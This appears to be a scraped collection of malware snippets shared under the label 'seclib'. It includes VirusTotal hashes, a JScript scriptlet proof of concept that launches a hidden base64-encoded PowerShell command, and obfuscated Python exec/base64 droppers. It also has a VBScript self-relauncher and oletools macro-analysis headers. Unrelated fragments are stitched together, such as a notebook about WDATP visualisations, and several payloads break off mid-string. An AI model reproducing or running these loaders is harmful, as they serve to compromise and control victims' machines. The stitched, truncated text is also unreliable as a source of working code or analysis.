seclib

## PowerShell example payloads on VT
0255345614907b1959b453ba7fbcea41c9eff616bdd6b0f588d488bd459ed0be
086b1c3bb877ea9f24564004156bd73a9a60639ef1fbd9e950e3e2183aeaa9c5
092346663482217f75c89afc2ed295acb68f3dcca586956e7516241a97c24f3b
1aef012e1cf317319aa043b288192440d7fee47b3529578eb7329f76bdd26697
1b33eac5b2e2345862cfb640ecae3ed2c8086cbbccb72eb6803f2506374fbad2
234d679a09ee0c8dff938c8a3435c47b158efc5e84b06326c499b7004674b55f
365c3cb4f905d182a655402b92018ef3335453e7de9239b111cd3410f44de6c0
520168111dc43c54be9aaa7ce80470547f7c0581c6275489670dfc9bf1c2343f

seclib

#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtabimport binascii
import code
import os
import platform
import random
import re
import select
import socket

seclib

Dependencies

To view the visualizations below, you may need to install holoviews:

!pip install holoviews
!pip install --upgrade bokeh

When your app is registered to call the WDATP APIs you need to pass the credentials in to this sample.

seclib

{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Dependencies \n",
    "\n",
    "To view the visualizations below, you may need to install holoviews:\n",
    "\n",

seclib

<?XML version="1.0"?>
<scriptlet>
<registration>
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[ 

				var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcA

seclib

## Uploaded by @satya_enki

exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("IyEvZjkvZmUvZDEKCmIgODAsMTMKYiAyNApiIDVkCmIgMWEsIDI1CmIgZgpiIGI4CmIgYWEKYTcgYWQgYiAxMDgsIGM1CmE3IDI1IGIgNDcsIGI0LCA3NApiIDMzCmIgOGUKYiBhNQpiIGFkCgo1MCA9ICI4ODovL2ZhLjU3LmZmIgozNSA9IDUwKyIvMTA5LTkzLzkzLWYxLmZjIgo1ZSA9IDM1ICsgIj83Nj05ZCYxMTU9Ni41LjEiCjQ5ID0gNTArIi80OS8iCgoxZCA9IDZhKDVkLjRmWzFdKQo3MSA9ICJjYy42ZS44MiIKYTQgPSA4MC43OCgnYmE6Ly9iNS85OC8lY2InICUgKDcxKSkKOTAgPSAzMy45MSgpCjVhID0gMzMuOTEoKS4zZQoxMDggPSA5MC4zZSgnMTA4JykKMjMgPSAxMDgrIi9lYy5jZCIKYjYgPSAxMDgrIi9mNC5jZCIKNWMgPSAxMDgrIi9kNS45YiIKYjEgPSAyNC43MCgpCgoKMTQgY2UoMTAzLCA1Nj0nJywgNGM9JycpOgoJNDMgNTY6IDY5ID0gMjUuNDcoMTAzLCA1NikKCThhOiA2OSA9IDI1LjQ3KDEwMykKCTY5LjUxKCdhMC05NCcsICc3Mi81LjAgKDczOyAxMTE7IDczIDExMiA1LjE7IGEyLTEwYjsgZTg6MS45LjAuMykgOTcvOTYgNmYvMy4wLjMnKQoJNDMgNGM6CgkgIDY5LjUxKCdiNycsIDRjKQoJNDIgPSAyNS43NCg2OSkKCTE4PTQyLmVkKCkKCTQyLmU2KCkKCWMgMTgKCQoxNCA2MCgxMDMsIDU1LCAyMyk6CgkzNiA9IDI0LjYzK

seclib

## uploaded by @satya_enki

olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
===============================================================================
FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
Type: OLE
-------------------------------------------------------------------------------

seclib

## Sample Hash: f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("IyEvZjkvZmUvZDEKCmIgODAsMTMKYiAyNApiIDVkCmIgMWEsIDI1CmIgZgpiIGI4CmIgYWEKYTcgYWQgYiAxMDgsIGM1CmE3IDI1IGIgNDcsIGI0LCA3NApiIDMzCmIgOGUKYiBhNQpiIGFkCgo1MCA9ICI4ODovL2ZhLjU3LmZmIgozNSA9IDUwKyIvMTA5LTkzLzkzLWYxLmZjIgo1ZSA9IDM1ICsgIj83Nj05ZCYxMTU9Ni41LjEiCjQ5ID0gNTArIi80OS8iCgoxZCA9IDZhKDVkLjRmWzFdKQo3MSA9ICJjYy42ZS44MiIKYTQgPSA4MC43OCgnYmE6Ly9iNS85OC8lY2InICUgKDcxKSkKOTAgPSAzMy45MSgpCjVhID0gMzMuOTEoKS4zZQoxMDggPSA5MC4zZSgnMTA4JykKMjMgPSAxMDgrIi9lYy5jZCIKYjYgPSAxMDgrIi9mNC5jZCIKNWMgPSAxMDgrIi9kNS45YiIKYjEgPSAyNC43MCgpCgoKMTQgY2UoMTAzLCA1Nj0nJywgNGM9JycpOgoJNDMgNTY6IDY5ID0gMjUuNDcoMTAzLCA1NikKCThhOiA2OSA9IDI1LjQ3KDEwMykKCTY5LjUxKCdhMC05NCcsICc3Mi81LjAgKDczOyAxMTE7IDczIDExMiA1LjE7IGEyLTEwYjsgZTg6MS45LjAuMykgOTcvOTYgNmYvMy4wLjMnKQoJNDMgNGM6CgkgIDY5LjUxKCdiNycsIDRjKQoJNDIgPSAyNS43NCg2OSkKCTE4PTQyLmVkKCkKCTQyLmU2KCkK

seclib

## Uploaded by @satya_enki
bbbb2b38859b4f36
On Error Resume Next
Dim objShell : Set objShell = CreateObject("WScript.Shell"## uplo

If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
    For Each vArg In WScript.Arguments
        sArgs = sArgs & " """ & vArg & """"
    Next
    objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit")

seclib

## Sample hash 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:MAS-HB-- 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
===============================================================================
FILE: 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls